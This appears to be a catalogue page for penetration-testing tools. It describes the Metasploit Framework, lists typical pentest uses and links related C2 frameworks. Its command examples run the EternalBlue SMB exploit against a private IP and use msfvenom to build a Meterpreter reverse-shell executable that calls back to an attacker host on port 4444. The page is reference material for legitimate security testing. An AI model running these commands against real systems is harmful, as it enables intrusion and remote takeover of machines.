provocativo_
back to the arsenal
// arsenal·ExploitationIntermediateFOSS

Metasploit Framework/meta-sploit/

Rapid7's open-source exploitation framework — thousands of exploit modules.

Exploitation

$ metasploit-framework --help

Metasploit Framework

Metasploit Framework logo
Metasploit Framework logoWikimedia Commons

// what it is

Description

The standard offensive toolkit for the last 20 years. Ships with 2000+ exploits, 1000+ auxiliary modules, hundreds of payloads, and the Meterpreter post-exploit agent. Every offensive infosec course teaches it.

// use cases

What people use it for

  • Quickly exploit a known CVE during a pentest
  • Generate payloads via msfvenom
  • Catch reverse shells via multi/handler

// commands

The commands you'll type

Console launch

$ msfconsole -q

Run an exploit

$ msf6 > use exploit/windows/smb/ms17_010_eternalblue
 msf6 > set RHOSTS 10.0.0.5
 msf6 > run

Generate Meterpreter exe

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o p.exe

// facts

category
Exploitation
platforms
LIN · WIN · MAC
license
FOSS
difficulty
Intermediate

// links

// related in Exploitation

ExploitationAdvanced

Covenant

.NET-based open-source C2 framework with a web UI.

FOSS
LIN·WIN
open entry →
ExploitationAdvanced

Cobalt Strike

Commercial adversary simulation — the industry-standard red-team C2.

Commercial
LIN·WIN·MAC
open entry →
ExploitationAdvanced

Sliver

Bishop Fox's open-source cross-platform C2 — a rising Cobalt Strike alternative.

FOSS
LIN·WIN·MAC
open entry →